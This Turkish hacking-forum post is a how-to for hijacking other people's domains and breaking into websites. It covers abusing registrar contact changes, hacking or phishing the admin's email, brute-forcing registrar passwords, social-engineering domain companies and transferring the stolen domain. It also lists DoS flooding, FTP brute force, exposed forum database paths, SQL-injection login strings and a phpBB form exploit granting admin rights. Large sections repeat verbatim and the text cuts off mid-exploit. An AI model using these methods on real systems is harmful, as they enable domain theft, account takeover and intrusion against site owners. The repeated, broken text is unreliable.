ADIM ADIM BIR DOMAIN ALANINI HACKLEYELIM.ORNEGIN HACKLEYECEGIMIZ ALAN www.hacklenecek.com <http://www.hacklenecek.com> OLSUN.BU ALANI SAHIBINDEN ALIP KENDI ADIMIZA GECIRECEGIZ.DOGAL OLARAK ICERIGINI DEGISTIRMEK KONUSUNDA TAM YETKILI OLACAKSINIZ.IHTIYACIMIZ OLANLAR;ANONIM MAIL ATABILECEK BIR PROGRAM.MAIL-BOMBER DENEN PROGRAMLAR ISE YARAR..ILKINI UNDERGROUND SITELERDEN*IKINCIYI www.softseek.com <http://www.softseek.com> ADRESINDEN BULABILIRSINIZ.IKINCI OLARAK*GERCEK KIMLIK BILGILERINI VERMEDEN ALDIGINIZ BIR MAIL HESABINA IHTIYAC VAR.YOKSA*HOTMAIL VEYA YAHOO'DAN ALIVERIN BIR TANE.SIMDI www.networksolutions.com <http://www.networksolutions.com> ADRESINE BAGLANIN.YUKARIDA WHOIS ADLI BIR BOLUM VAR.TIKLAYIN VE www.hacklenecek.com <http://www.hacklenecek.com> ADRESINI YAZIN.GELEN BILGILER;
Registrant:
hACKLENECEK (ex24-DOM)
Address details
Domain Name: HACKLENECEK.ORG
Administrative Contact* Technical Contact* Zone Contact* Billing Contact:
DOMAIN* ADMIN (ADM001) www.networksolutions.com[/URL] <http://www.networksolutions.com> ADRESINE GIDIN.MAKE CHANGES YAZAN YERE TIKLAYIN.(DEGISIKLIK YAPMAK DEMEKTIR).HACKLEYECEGINIZ DOMAIN ALANININ ADINI YAZIN.SIMDI CIKAN SAYFADA EXPERT YAZISI GECEN YERE TIKLAYIN.ARKADAN CONTACT FORM YAZAN YERE TIKLAYIN.IKI TANE BOS ALAN ICEREN SAYFA ACILDI ISE*YUKARIYA;SARI RENKLI ORNEK SATIRLARINDAN 6.DA GORDUGUNUZ*ADMIN YAZISI YANINDA PARANTEZ ICINDE YAZAN NUMARANIN*HACKLEYECEGINIZ DOMAIN ALANI OLANI ICIN YAZIN.YUKARIDAKI ORNEKTE BU;ADM001'DIR.ASAGIDAKI KUTUYA ADAMIN MAIL ADRESINI YAZIN.ALT SATIRDA GORDUGUNUZ MODIFY YAZISINI ISARETLEYIN.PROCEED CONTACT INFORMATION YAZISINI TIKLAYIN.ACILAN FORMDA*MAIL FROM SIKKINI ISARETLEYIN.GO ON TO CONTACT DATA INFORMATION YAZAN YERE TIKLAYIN.SIMDI ONUNUZE ACILAN FORMDA AMCAMIN TUM BILGILERINI GORURSUNUZ.BURADAKI MAIL ADRESINI DEGISTIRIP KENDINIZINKINI YAZIN.SIMDI PROCEED TO SET AUTHORISATION SCHEME YAZISINA TIKLAYIN.MAIL FROM SIKKINI ISARETLEYIN.BURADA AMCAMIN MAIL ADRESINI TEKRAR GIRIN.GENERATE CONTACT FORM YAZISINI TIKLAYIN.SIMDI SOYLE BIR GORUNTU GELIR:
******** Please DO NOT REMOVE Version Number ********
Contact Version Number: 1.0
******** Please see attached detailed instructions ********
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN* ADMIN
1d. Organization Name.......: HACKLENECEK
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox..............BURAYA KENDI MAILINIZI YAZIN
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: [EMAIL="[email protected] [URL="https://tik.lat/JvLhE"] www.networksolutions.com[/URL] <http://www.networksolutions.com>
To register or update information about a name server* complete and submit the Host Form to [EMAIL="[email protected] [URL="https://tik.lat/ywawZ"] www.arama.com/domain.php3[/URL] <http://www.arama.com/domain.php3> (tr sitelerde whois dökümde yüksek oran)
[URL="https://tik.lat/igDAm"] www.allwhois.sc[/URL] <http://www.allwhois.sc> (Tüm ülkelere whois çekebilirsiniz)
[URL="https://tik.lat/dedVm"] www.pir.org[/URL] <http://www.pir.org> (.org lerin whoislerinde aracı firmaları görebilirsiniz)
<http://www.namestead.com/domains/to...ist.aspreferans> codeların açık adresleri)
[URL="https://tik.lat/dc3e5"] www.whois.sc[/URL] <http://www.whois.sc> (free üyelikle geniş whois bilgileri)
Bu whois firmalarını tavsiye ederim. Admin maili ve özellikle domain şirketini görmede fayda sağlayacaktır. Şimdi farzedelim admin mailini göremiyoruz. İki açıklaması olabilir. Ya proxydomain veya whois guardian kullanılmıştır ki bunlar whois bilgilerini gizlerler. Böyle bir sorundada admin mailini ya buradaki üyeliği hackleyerek bulacaksınız yada domain panelinde tahmin ettiğiniz mailleri deneyerek bulacaksınız. (bu deneme dediğimiz çoğu domain şirketi Şifre Kayıp başvurusunu yaptıktan sonra mail adresi istemektedir. Bu sorguya mail adreseleri deneyerek gerekli şifre isteği mail adresine gönderilmiştir gibi yazılacak ibareye kadar olur.... (Bazı tr şirketlerine telefon açarak dil aldatmacısıylada bir kaç kere admin mailini öğrendiğimiz olmuştur. Örnek whoisde gözüken agirdad************* <mailto:agirdad*************> hackleyip Şifre isteğinde bulunup mail adresinin firmada deaktif gözüktüğünü ve domain şirketini arayıp mailin agirdad2************* <mailto:agirdad2*************> a aktarıldığını öğrenmiştik.) Farzedelimki admin mailini hacklediniz. Domain Paneline giderek şifremi unuttum diyebilir ve domain şifresini maili isteyebilirsiniz.. User ID gibi bilemiyeceginiz bir sorgulama yöntemi varsa domain şirketine hacklediginiz mailden mail atarakta istekte bulunabilirsiniz... Bununda örneği var ama şu anda süpriz...
2- Domain Şifre Hack: Bu başlıkta yazılacak ve karalanacak o kadar çok şey varki o nedenle hızlı hızlı geçmek istiyorum... Verdiğim Whois Firmalarından domain şirketini bulduğunuzu düşünerek:
İlk yapmanız gereken Brute yöntemidir. Brute dediğimiz verilen şifreleri deneme yöntemidir. Bu ister tek tek deneyerek sizde yapabilirsiniz istenirse bir program vasıtasıyla da yapabilirsiniz... Username sabit pass değişken olarak yaparsanız daha çözüme daha kısa yoldan ulaşırsınız... Username bilinmiyorsa %90 [URL="https://tik.lat/loVQn"] www.xxxxxxxx.com[/URL] <http://www.xxxxxxxx.com> username xxxxxxxxxcom olmakta. Veyahut Paneldende bulabilirsiniz. Çoğu firmada geçersiz username diye belirtmektedir... Brute de hızlı sonuca ulaşmak istiyorsaniz karşı tarafın bilgilerini kelimelere döküp bir porg. vasıtasıyla wordlist oluşturabilirsiniz. Örn. Antalyadaki bir web sitesi için. 07* antalya* websitenin ismi* adminin adı* soyadı* tr* domainin sesli harfleri* sessiz harfleri* gibi kelimelerden yapılan güzel bir karma olasılığı yükseltir... En kötü ihtimal Brute Force gibi seçenekle tüm karakterleri denettirebilirsiniz...
Brute da bulamadınız veya uğraşmadan daha teknik bir yol arıyorsanız oda domain şirketinin database ine ulaşmanızdır ki buda herkesin yapabileceği iş değildir... Buna ek olarak Domain Panelinin birebir fake ini hazırlayabilirsiniz. İnandırıcı olması içinde whois bilgilerinden yararlanıp son update tarihine bakarak şu süredir sitenize on-line olmamaktasınız* en kısa sürede on-line olmalısınız gibi ibareler kullanabilirsiniz. Normalde Mail hackte kullanılan fake domain veya host hacklerde profesyonelce yapıldıktan sonra daha yüksek oranlı sonuçlar alınabilmektedir...
Bazı domain şirketlerindeki hidden gibi açıklarlada bu yapılabildiğini duymuştum. Fakat şimdiye kadar ne rastgeldi nede gözlerimle şahit oldum.
3- Süresi Bitmiş Domaini Satın Almak: Pek tavsiye edilen veya hackle alakalı bir yöntem değildir. Fakat gerçekten alınması gereken bir domainde bilinen bilinmeyen tüm yöntemler denendiği halde çözüme ulaşılamamışsa mecburen son çaredir. Su ana kadar ne yaptım* nede yapanı gördüm ayrı bir konu.
İlk iki yöntemden sonuca ulaştınız diyelim. Domain bilgilerine girdiniz. İlk yapacağınız şey karşı tarafın tel.no gibi adreslerini değiştirerek oraya kendi sallama bilgilerinizi girmek olmalıdır. Ve ns ayarlarını değiştirerek istediğiniz bir hosta yönlendirme yapmanızdır. Bununda aktifleşmesi .org ler hariç en fazla 24 saat sürmektedir...
(Ayrıca Domaini kesinlikle geri alınmamasını sağlamak için transfer gerçekleştirin. Transfer edilince sanki domain yeni alınmış gibi süreleri değişir ve 1 yıl daha uzatılır. Başımıza geldi hackten anlamayan bir kaç kişi çıkıpta whois çekerse sizin yazdıklarınızı görür. O vatandaşta domain hacklenmemiş saten o kişiye aitti gibi bir lamerlik yapabilirler. Uyarması... )
Bu bilgiler hackten az çok anlayan herkesin bildiği şeylerdir ve kesinlikle tek cümlesi alıntı değildir. Bu bilgiler eğitim amaçlıdır.
--------------------------------------------------------------------------
Domain Hack 2. Bölüm!!
DOMAİN HACK
domain hack'e yeni baslayanlar icin gayet güzel anlasilabilir bir döküman .
ir hedef siteye saLdırı yöntemLeri..
Basitten zora doğru bir sıraLama yaptım..EkLemek istedikLeriniz warsa ekLeyiniz..
1.Whois
[URL="https://tik.lat/5oUxZ"] www.arama.com/domain.php3[/URL] ten whois çekiyoruzz..
Eğer mynet hotmail yaho faLansa hackLiyoruz.Eğer başKaysa onun fake kodunu hazırLıyoruzz.
HackLediğimiz maiLLe hosta gidip şifremizi istetiyoruz..
2.FLood
Denyo Launch War TooL gibi programLarLa fLood yaparak siteyi geçici oLarak erişimi yasakLayabiLiriz(Bandwith oLayı)
Ya da forumLarın anketLere fLood yaparak hata wermeLerini sağLayabiLirz.MeseLa mynetteki anketLere fLooD çekince sıfırLanıyor.
Tabi fLoodunda şekiLLeri war.BunLarı burada açıkLamak istemiyorumm.Ama en etkiLi fLood member regLemektir..AkLınızın bir köşesinde buLunsun..
3.Ftp brute Force..
Cracker Jack vcrack ftp gibi programLarLa ftp şifresini buLmak için brute force yapıLır..
İyi bir bağLantı we duruma göre kaLiteLi bir wordList gerektirebiLir..
Siz karşıdaki kşiye göre kendinizde hazırLayabiLirsinizz..
Bu programLarın kuLLanIMLarı forumLarımızda warr...
4.AçıkLar.
BeLkide üstünde sayfaLar yazıLabiLecekk böLüm..
Php asp sistemLerin birçok açığı warr.
ASP:
Çok kuLLanıLan webwiz we snitz forumLarı (binLerce)
HackLemek çok basit..
snitz forumLarı - snitz_forums_2000.mdb
Webwiz forumLarı - /admin/wwforum.mdb bu şekİlde main database e uLaşıp admin şifrelerini accessLe weya başka bir msb browserLa açarak buLabiLirsinizz..Sonra forum sizin emrinizde..
Asp nuke siteLerdede /db/main.mdb denersenizz db Dosyasını buLabiLirsiniz..
*Herhangi bir sitenin mdb si içinse O sitenin üyeLik sistemi portaLını buLarak bunLarı aspindir.com dan indirerek db yoLuna bakarsınızz..
BunLar
db/uyelik.mdb /db/members.mdb /db/sifreler.mdb oLabiLir..
Bu şekiLde googLedan aratak rastgeLe sitede hackLeyebiLirsinizz..
Bir mdb buLma yöntemi:
*Asp siteLerde üyeLik sistemLeri site yönetimi için portaLLar geneLLikLe geneL hazır scriptLerden yazıLmıştır...
.mdb hackLemek için herkez googLe dan inurl"x.mdb" oLarak aratır..
Şimdi benim diyeceği yöntem hiç bi yerde yoq we tamamen benim tarafımdan buyLunmuşturr.
[URL="https://tik.lat/laqC7"] www.aspindir.com[/URL]
[URL="https://tik.lat/NxOvK"] www.asparsivi.com[/URL]
[URL="https://tik.lat/oNJ08"] www.maxiasp.com[/URL] siteLerinden hazır bir üyeLik sistemi indiriyoruzz..
MeseLa xp üyeLik sistemini indirin.
Db yoLuna bakın..
Bakıyoruzz..
/db/uyelik.mdb
Şimdi googLe! a girip Xp üyeLik sistemi diye aratınn..
Ewet "xp üyelik sistemi" şekLinde aratığınızda karşınıza onLarca sayfa çıkacaktır..
Bu iLk 4 sayfada 20 1ye yakın sitede bu açıkTan war.
Çıkan sonuçLarın db Lerini indirip accessLe açarsanızz şifreLer eLinizdee..
*SqL İnjection
user 'or' şifre: 'or' bu şekiLde admin girişi yapabiLirsiniz..
*Php
Php sistemLerinde açığı war..
Php-nuke 5.5 te haber ekLeme açığı weya kuLLanıcı adı:admin şifre:'or true'
GüwenLik açıkLarı böLümünden sql injection açığına bakarsanızz göreceksiniz..
Phpbb forumLarında açıkLarı wardır.MeseLa örnek oLaarak phbb2.0.0 açığı bu forumdan kaLmadı deniLebiLir ama örnek oLsun diye weriyorum.
-------------------------------
<form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>
---------------------------------
Bu KoD yeni bir üyeye admin yetkisi werir.
Birda phpbb forumLarın 2.0.3 de db.php açığını duydum..
BuLabiLirsem yayınLarım..
Birde bazı .php dosyalarını çaLarak admin şifreLerine uLaşabiLiyorduk.
Sanırım config.php diydi.
Bunu FLashget webzip tarzı programLarLa kendi pcmize yükLeyebiLiyoruz..
*php maiLList açığı
GoogLe dan aratıp vuLduunuz php maiLListLerin sonuna /ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz..
*Cgi script açıkLarı..
WebBBS Scriptleri
----
WebBBS - Bulletin Board System (Bildiri Tahtası Sistemi) Bu sistem yukarıda size örneklediğim gibi siteye mesaj atmak için kullanılır.
Bu sistem bünyesinde bu bildiri tahtalarına üye kimselerin kullanıcı adı/şifre kombinasyonlarını bulundurur.Böylelikle istediğiniz kişi adına
bildiri tahtasına mesaj gönderebilirsiniz.
Açık : [URL="https://tik.lat/gfGKu"] http://www.hedefsite.com/cgi-bin/webBBS/profiles/[/URL] ya da [URL="https://tik.lat/r6MaM"] http://www.hedefsite.com/cgi-bin/webBBS/users/[/URL]
WebAdvert Scriptleri (RekLamLar..)
WebAdverts (WebReklam) Bu scriptler sayesinde site yöneticisi sitede aldığı reklamları yayınlar.Her reklam için ayrı hesap vardır.
Bu açığı kullanarak kendi hazırladığınız bannerları sitede yayınlayabilirsiniz.Ayrıca diğer reklam verenlerin hesaplarını silmek ya da bannerlarını
değiştirmek elinizde.
Açık : [URL="https://tik.lat/YFwcP"] http://www.hedefsite.com/cgi-bin/advert/adpassword.txt[/URL] --> Şifrelerin bulunduğu .txt ..
WWWBoard Scriptleri
wEBBSS İLe aynı şekiLde..
Açık : [URL="https://tik.lat/bvreT"] http://www.hedefsite.com/cgi-bin/wwwebboard.txt[/URL]
Açık : [URL="https://tik.lat/YUOoh"] http://www.hedefsite.com/cgi-bin/wwwboard.txt[/URL]
Açık : [URL="https://tik.lat/r6GZu"] http://www.hedefsite.com/webboard/password.txt[/URL]
-------------------------
MaillistLer..
-------------------------
Açık : [URL="https://tik.lat/vgn3V"] http://www.hedefsite.com/cgi-bin/mailman/addresses.txt[/URL]
Açık : [URL="https://tik.lat/BHk8g"] http://www.hedefsite.com/cgi-bin/maillist/addresses.txt[/URL]
Açık : [URL="https://tik.lat/lZv3j"] http://www.hedefsite.com/cgi-bin/mail/addresses.txt[/URL]
Açık : [URL="https://tik.lat/tG0C4"] http://www.hedefsite.com/cgi-bin/maillist/users.txt[/URL]
AçıkLARI BuLmak..
Scriptler hakkında geniş bilginiz yoksa ve yukarıda örneklediğim türden belirli başlı açıkları bilmiyorsanız Cgi Zayıflık Tarayıcılarını kullanmanızı öneririm.
Çeşitli tarayıcılar var bu alanda*bir kısmını deniyebilirsiniz.Önemli olan tarayıcının bünyesinde bulundurduğu açık sayısı.Bu çok önemlidir.Bir tarayıcı bünyesinde
ne kadar çok açık bulundurursa o kadar şansınız artar.Tarayıcınızın güncelleme seçeneği varsa sık sık yenilemenizi öneriririm.Güncelleme seçeneği yoksa birden fazla
tarayıcı kullanmalısınız.Unutmamanız gereken en önemli nokta ise her bulduğunuz scripti hackliyemeyeceğiniz.
Size daha pratik bir yol daha söyliyeyim* [URL="https://tik.lat/Ojzc5"] www.arabul.com[/URL] - [URL="https://tik.lat/YP8eZ"] www.netbul.com[/URL] gibi siteler kayıtlı olan web siteleri içerisinde her türlü kelimeyi arama özelliğine sahiptir.Bu
tip arama motorlarına ****crawler denir.Yabancı servis olarak size tavsiyem [URL="https://tik.lat/Z2nQA"] www.webcrawler.com[/URL] ya da http://www.****crawler.com/www.****crawler.com[/URL].
Örnek Aratabileceğiniz kelimeler;
cgi-bin
cgi-bin/örnek.pwd
cgi-bin/password.txt
cgi-bin/örnek.cfg
*ExpLoitLer
Eksik oLduğum konu bu fazla biLgim yok buLabiLeceğiniz adresLer..
AdresLer:
[URL="https://tik.lat/ugO4r"] www.k-otik.com/exploits[/URL]
[URL="https://tik.lat/wLGvz"] www.securityfocus.com[/URL] gibi adreslerde buLabiLirsiniz..
5.ListPath
En sewdigiim hack yöntemLerinden biridir..
Bir php weya asp kodu çaLıştırarak o hostun tüm siteLere erişim hakkı sağLanır.ELmaLı şeker iLk çıktığında oLay yaratmıştı.
Fakat bu ListpathLeri nerden buLacağız??
Sitemizi inceLeyin we [URL="https://tik.lat/W3mZI"] www.kullanilmasiyasaknick[/URL] a da arada sırada bakınn..
Bu oLay free hostLarda çaLışmaz..Denemeyin yani..
HackLemeniz için bi hosttan yer kiraLamanız Lazım..
6.Domain reg..
Eğer hedef site mutLaka hackLenmek zorundaysa hostun bitiş tarihi yakınsa hemen bittği gün hostu domaini ederekte yapabiLirsinizz..Sonra istediiniz gibi index atın cc iLe yapabiLirsiniz bu oLayı..
Yine sitemizde dağıtıLıyor..
7.Birtakım bazı açıkLar..
Unicode commander.pL gibi eski fakat hakkını wermemiz gereknn açıkLar..
Unicode birçok devLet sitesinde duruyor haLa..
Commander.pL service.pwd cgi/bin açıkLarı bunLardan bahsetmiyorum..Zaten her yerde war ayrıca bu açıkLarı buLunduran pek site kaLmadı..
Registrant:
hACKLENECEK (ex24-DOM)
Address details
Domain Name: HACKLENECEK.ORG
Administrative Contact* Technical Contact* Zone Contact* Billing Contact:
DOMAIN* ADMIN (ADM001) www.networksolutions.com[/URL] <http://www.networksolutions.com> ADRESINE GIDIN.MAKE CHANGES YAZAN YERE TIKLAYIN.(DEGISIKLIK YAPMAK DEMEKTIR).HACKLEYECEGINIZ DOMAIN ALANININ ADINI YAZIN.SIMDI CIKAN SAYFADA EXPERT YAZISI GECEN YERE TIKLAYIN.ARKADAN CONTACT FORM YAZAN YERE TIKLAYIN.IKI TANE BOS ALAN ICEREN SAYFA ACILDI ISE*YUKARIYA;SARI RENKLI ORNEK SATIRLARINDAN 6.DA GORDUGUNUZ*ADMIN YAZISI YANINDA PARANTEZ ICINDE YAZAN NUMARANIN*HACKLEYECEGINIZ DOMAIN ALANI OLANI ICIN YAZIN.YUKARIDAKI ORNEKTE BU;ADM001'DIR.ASAGIDAKI KUTUYA ADAMIN MAIL ADRESINI YAZIN.ALT SATIRDA GORDUGUNUZ MODIFY YAZISINI ISARETLEYIN.PROCEED CONTACT INFORMATION YAZISINI TIKLAYIN.ACILAN FORMDA*MAIL FROM SIKKINI ISARETLEYIN.GO ON TO CONTACT DATA INFORMATION YAZAN YERE TIKLAYIN.SIMDI ONUNUZE ACILAN FORMDA AMCAMIN TUM BILGILERINI GORURSUNUZ.BURADAKI MAIL ADRESINI DEGISTIRIP KENDINIZINKINI YAZIN.SIMDI PROCEED TO SET AUTHORISATION SCHEME YAZISINA TIKLAYIN.MAIL FROM SIKKINI ISARETLEYIN.BURADA AMCAMIN MAIL ADRESINI TEKRAR GIRIN.GENERATE CONTACT FORM YAZISINI TIKLAYIN.SIMDI SOYLE BIR GORUNTU GELIR:
******** Please DO NOT REMOVE Version Number ********
Contact Version Number: 1.0
******** Please see attached detailed instructions ********
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN* ADMIN
1d. Organization Name.......: HACKLENECEK
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox..............BURAYA KENDI MAILINIZI YAZIN
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: [EMAIL="[email protected] [URL="https://tik.lat/JvLhE"] www.networksolutions.com[/URL] <http://www.networksolutions.com>
To register or update information about a name server* complete and submit the Host Form to [EMAIL="[email protected] [URL="https://tik.lat/ywawZ"] www.arama.com/domain.php3[/URL] <http://www.arama.com/domain.php3> (tr sitelerde whois dökümde yüksek oran)
[URL="https://tik.lat/igDAm"] www.allwhois.sc[/URL] <http://www.allwhois.sc> (Tüm ülkelere whois çekebilirsiniz)
[URL="https://tik.lat/dedVm"] www.pir.org[/URL] <http://www.pir.org> (.org lerin whoislerinde aracı firmaları görebilirsiniz)
<http://www.namestead.com/domains/to...ist.aspreferans> codeların açık adresleri)
[URL="https://tik.lat/dc3e5"] www.whois.sc[/URL] <http://www.whois.sc> (free üyelikle geniş whois bilgileri)
Bu whois firmalarını tavsiye ederim. Admin maili ve özellikle domain şirketini görmede fayda sağlayacaktır. Şimdi farzedelim admin mailini göremiyoruz. İki açıklaması olabilir. Ya proxydomain veya whois guardian kullanılmıştır ki bunlar whois bilgilerini gizlerler. Böyle bir sorundada admin mailini ya buradaki üyeliği hackleyerek bulacaksınız yada domain panelinde tahmin ettiğiniz mailleri deneyerek bulacaksınız. (bu deneme dediğimiz çoğu domain şirketi Şifre Kayıp başvurusunu yaptıktan sonra mail adresi istemektedir. Bu sorguya mail adreseleri deneyerek gerekli şifre isteği mail adresine gönderilmiştir gibi yazılacak ibareye kadar olur.... (Bazı tr şirketlerine telefon açarak dil aldatmacısıylada bir kaç kere admin mailini öğrendiğimiz olmuştur. Örnek whoisde gözüken agirdad************* <mailto:agirdad*************> hackleyip Şifre isteğinde bulunup mail adresinin firmada deaktif gözüktüğünü ve domain şirketini arayıp mailin agirdad2************* <mailto:agirdad2*************> a aktarıldığını öğrenmiştik.) Farzedelimki admin mailini hacklediniz. Domain Paneline giderek şifremi unuttum diyebilir ve domain şifresini maili isteyebilirsiniz.. User ID gibi bilemiyeceginiz bir sorgulama yöntemi varsa domain şirketine hacklediginiz mailden mail atarakta istekte bulunabilirsiniz... Bununda örneği var ama şu anda süpriz...
2- Domain Şifre Hack: Bu başlıkta yazılacak ve karalanacak o kadar çok şey varki o nedenle hızlı hızlı geçmek istiyorum... Verdiğim Whois Firmalarından domain şirketini bulduğunuzu düşünerek:
İlk yapmanız gereken Brute yöntemidir. Brute dediğimiz verilen şifreleri deneme yöntemidir. Bu ister tek tek deneyerek sizde yapabilirsiniz istenirse bir program vasıtasıyla da yapabilirsiniz... Username sabit pass değişken olarak yaparsanız daha çözüme daha kısa yoldan ulaşırsınız... Username bilinmiyorsa %90 [URL="https://tik.lat/loVQn"] www.xxxxxxxx.com[/URL] <http://www.xxxxxxxx.com> username xxxxxxxxxcom olmakta. Veyahut Paneldende bulabilirsiniz. Çoğu firmada geçersiz username diye belirtmektedir... Brute de hızlı sonuca ulaşmak istiyorsaniz karşı tarafın bilgilerini kelimelere döküp bir porg. vasıtasıyla wordlist oluşturabilirsiniz. Örn. Antalyadaki bir web sitesi için. 07* antalya* websitenin ismi* adminin adı* soyadı* tr* domainin sesli harfleri* sessiz harfleri* gibi kelimelerden yapılan güzel bir karma olasılığı yükseltir... En kötü ihtimal Brute Force gibi seçenekle tüm karakterleri denettirebilirsiniz...
Brute da bulamadınız veya uğraşmadan daha teknik bir yol arıyorsanız oda domain şirketinin database ine ulaşmanızdır ki buda herkesin yapabileceği iş değildir... Buna ek olarak Domain Panelinin birebir fake ini hazırlayabilirsiniz. İnandırıcı olması içinde whois bilgilerinden yararlanıp son update tarihine bakarak şu süredir sitenize on-line olmamaktasınız* en kısa sürede on-line olmalısınız gibi ibareler kullanabilirsiniz. Normalde Mail hackte kullanılan fake domain veya host hacklerde profesyonelce yapıldıktan sonra daha yüksek oranlı sonuçlar alınabilmektedir...
Bazı domain şirketlerindeki hidden gibi açıklarlada bu yapılabildiğini duymuştum. Fakat şimdiye kadar ne rastgeldi nede gözlerimle şahit oldum.
3- Süresi Bitmiş Domaini Satın Almak: Pek tavsiye edilen veya hackle alakalı bir yöntem değildir. Fakat gerçekten alınması gereken bir domainde bilinen bilinmeyen tüm yöntemler denendiği halde çözüme ulaşılamamışsa mecburen son çaredir. Su ana kadar ne yaptım* nede yapanı gördüm ayrı bir konu.
İlk iki yöntemden sonuca ulaştınız diyelim. Domain bilgilerine girdiniz. İlk yapacağınız şey karşı tarafın tel.no gibi adreslerini değiştirerek oraya kendi sallama bilgilerinizi girmek olmalıdır. Ve ns ayarlarını değiştirerek istediğiniz bir hosta yönlendirme yapmanızdır. Bununda aktifleşmesi .org ler hariç en fazla 24 saat sürmektedir...
(Ayrıca Domaini kesinlikle geri alınmamasını sağlamak için transfer gerçekleştirin. Transfer edilince sanki domain yeni alınmış gibi süreleri değişir ve 1 yıl daha uzatılır. Başımıza geldi hackten anlamayan bir kaç kişi çıkıpta whois çekerse sizin yazdıklarınızı görür. O vatandaşta domain hacklenmemiş saten o kişiye aitti gibi bir lamerlik yapabilirler. Uyarması... )
Bu bilgiler hackten az çok anlayan herkesin bildiği şeylerdir ve kesinlikle tek cümlesi alıntı değildir. Bu bilgiler eğitim amaçlıdır.
--------------------------------------------------------------------------
Domain Hack 2. Bölüm!!
DOMAİN HACK
domain hack'e yeni baslayanlar icin gayet güzel anlasilabilir bir döküman .
ir hedef siteye saLdırı yöntemLeri..
Basitten zora doğru bir sıraLama yaptım..EkLemek istedikLeriniz warsa ekLeyiniz..
1.Whois
[URL="https://tik.lat/5oUxZ"] www.arama.com/domain.php3[/URL] ten whois çekiyoruzz..
Eğer mynet hotmail yaho faLansa hackLiyoruz.Eğer başKaysa onun fake kodunu hazırLıyoruzz.
HackLediğimiz maiLLe hosta gidip şifremizi istetiyoruz..
2.FLood
Denyo Launch War TooL gibi programLarLa fLood yaparak siteyi geçici oLarak erişimi yasakLayabiLiriz(Bandwith oLayı)
Ya da forumLarın anketLere fLood yaparak hata wermeLerini sağLayabiLirz.MeseLa mynetteki anketLere fLooD çekince sıfırLanıyor.
Tabi fLoodunda şekiLLeri war.BunLarı burada açıkLamak istemiyorumm.Ama en etkiLi fLood member regLemektir..AkLınızın bir köşesinde buLunsun..
3.Ftp brute Force..
Cracker Jack vcrack ftp gibi programLarLa ftp şifresini buLmak için brute force yapıLır..
İyi bir bağLantı we duruma göre kaLiteLi bir wordList gerektirebiLir..
Siz karşıdaki kşiye göre kendinizde hazırLayabiLirsinizz..
Bu programLarın kuLLanIMLarı forumLarımızda warr...
4.AçıkLar.
BeLkide üstünde sayfaLar yazıLabiLecekk böLüm..
Php asp sistemLerin birçok açığı warr.
ASP:
Çok kuLLanıLan webwiz we snitz forumLarı (binLerce)
HackLemek çok basit..
snitz forumLarı - snitz_forums_2000.mdb
Webwiz forumLarı - /admin/wwforum.mdb bu şekİlde main database e uLaşıp admin şifrelerini accessLe weya başka bir msb browserLa açarak buLabiLirsinizz..Sonra forum sizin emrinizde..
Asp nuke siteLerdede /db/main.mdb denersenizz db Dosyasını buLabiLirsiniz..
*Herhangi bir sitenin mdb si içinse O sitenin üyeLik sistemi portaLını buLarak bunLarı aspindir.com dan indirerek db yoLuna bakarsınızz..
BunLar
db/uyelik.mdb /db/members.mdb /db/sifreler.mdb oLabiLir..
Bu şekiLde googLedan aratak rastgeLe sitede hackLeyebiLirsinizz..
Bir mdb buLma yöntemi:
*Asp siteLerde üyeLik sistemLeri site yönetimi için portaLLar geneLLikLe geneL hazır scriptLerden yazıLmıştır...
.mdb hackLemek için herkez googLe dan inurl"x.mdb" oLarak aratır..
Şimdi benim diyeceği yöntem hiç bi yerde yoq we tamamen benim tarafımdan buyLunmuşturr.
[URL="https://tik.lat/laqC7"] www.aspindir.com[/URL]
[URL="https://tik.lat/NxOvK"] www.asparsivi.com[/URL]
[URL="https://tik.lat/oNJ08"] www.maxiasp.com[/URL] siteLerinden hazır bir üyeLik sistemi indiriyoruzz..
MeseLa xp üyeLik sistemini indirin.
Db yoLuna bakın..
Bakıyoruzz..
/db/uyelik.mdb
Şimdi googLe! a girip Xp üyeLik sistemi diye aratınn..
Ewet "xp üyelik sistemi" şekLinde aratığınızda karşınıza onLarca sayfa çıkacaktır..
Bu iLk 4 sayfada 20 1ye yakın sitede bu açıkTan war.
Çıkan sonuçLarın db Lerini indirip accessLe açarsanızz şifreLer eLinizdee..
*SqL İnjection
user 'or' şifre: 'or' bu şekiLde admin girişi yapabiLirsiniz..
*Php
Php sistemLerinde açığı war..
Php-nuke 5.5 te haber ekLeme açığı weya kuLLanıcı adı:admin şifre:'or true'
GüwenLik açıkLarı böLümünden sql injection açığına bakarsanızz göreceksiniz..
Phpbb forumLarında açıkLarı wardır.MeseLa örnek oLaarak phbb2.0.0 açığı bu forumdan kaLmadı deniLebiLir ama örnek oLsun diye weriyorum.
-------------------------------
<form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
